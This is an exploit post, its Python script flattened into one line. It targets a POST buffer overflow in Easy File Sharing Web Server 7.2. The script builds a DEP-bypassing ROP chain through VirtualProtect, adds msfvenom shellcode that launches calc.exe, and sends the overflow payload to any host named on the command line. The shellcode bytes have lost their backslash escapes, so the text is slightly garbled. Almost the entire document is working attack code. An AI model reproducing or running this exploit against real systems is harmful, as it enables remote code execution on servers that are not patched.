Easy File Sharing 7.2 Buffer Overflow
Posted on 19 June 2017
#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP) # Exploit Author: bl4ck h4ck3r # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows XP SP2, Windows 2008 R2 x64 import socket import struct import sys if len(sys.argv) < 2: print " Usage: " + sys.argv[0] + " <host> " exit() # 0x1002280a : # ADD ESP,1004 # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ} ret = struct.pack("<I", 0x1002280a) # nopsled shellcode = "x90"*200 # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python shellcode += "x89xe7xd9xecxd9x77xf4x5dx55x59x49x49" shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43" shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30" shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30" shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49" shellcode += "x39x6cx5ax48x6bx32x55x50x67x70x47x70" shellcode += "x75x30x6ex69x78x65x65x61x39x50x31x74" shellcode += "x4cx4bx50x50x46x50x4cx4bx36x32x36x6c" shellcode += "x6cx4bx66x32x42x34x6cx4bx52x52x77x58" shellcode += "x54x4fx4cx77x63x7ax31x36x66x51x4bx4f" shellcode += "x4ex4cx47x4cx73x51x73x4cx76x62x76x4c" shellcode += "x51x30x59x51x78x4fx46x6dx76x61x48x47" shellcode += "x6ax42x79x62x50x52x50x57x4cx4bx63x62" shellcode += "x36x70x4ex6bx30x4ax37x4cx6ex6bx42x6c" shellcode += "x42x31x33x48x49x73x50x48x33x31x6ax71" shellcode += "x42x71x4cx4bx63x69x47x50x45x51x4ax73" shellcode += "x6cx4bx72x69x44x58x6bx53x67x4ax42x69" shellcode += "x6ex6bx45x64x4cx4bx46x61x6bx66x35x61" shellcode += "x39x6fx6cx6cx6bx71x58x4fx34x4dx46x61" shellcode += "x6bx77x44x78x6dx30x71x65x59x66x64x43" shellcode += "x61x6dx48x78x67x4bx61x6dx74x64x32x55" shellcode += "x4dx34x42x78x6ex6bx32x78x44x64x56x61" shellcode += "x68x53x62x46x4ex6bx36x6cx70x4bx4cx4b" shellcode += "x56x38x35x4cx56x61x59x43x6cx4bx76x64" shellcode += "x4cx4bx56x61x78x50x6ex69x61x54x37x54" shellcode += "x55x74x53x6bx63x6bx63x51x32x79x71x4a" shellcode += "x36x31x69x6fx4bx50x43x6fx31x4fx73x6a" shellcode += "x6ex6bx36x72x58x6bx4cx4dx53x6dx52x4a" shellcode += "x47x71x4cx4dx6fx75x48x32x43x30x53x30" shellcode += "x67x70x32x70x31x78x34x71x4ex6bx32x4f" shellcode += "x6cx47x39x6fx68x55x4fx4bx4cx30x68x35" shellcode += "x4fx52x33x66x50x68x79x36x5ax35x6dx6d" shellcode += "x4dx4dx49x6fx68x55x55x6cx76x66x53x4c" shellcode += "x75x5ax6bx30x59x6bx59x70x72x55x33x35" shellcode += "x6fx4bx37x37x76x73x74x32x70x6fx50x6a" shellcode += "x67x70x50x53x59x6fx69x45x65x33x75x31" shellcode += "x62x4cx61x73x46x4ex75x35x30x78x72x45" shellcode += "x45x50x41x41" def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ # 0x00000000, # [-] Unable to find gadget to put 00000201 into ebx 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFFDFE, # -202 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ} 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x1004de84, # &Writable location [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll] 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 0x100218f9, # POP EBP # RETN [ImageLoad.dll] 0x61c24169, # & push esp # ret [sqlite3.dll] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x1001bd98, # POP ECX # RETN [ImageLoad.dll] 0x1004de84, # &Writable location [ImageLoad.dll] 0x61c373a4, # POP EDI # RETN [sqlite3.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send("POST /sendemail.ghp HTTP/1.1 Email=" + buf + "&getPassword=Get+Password") s.close()
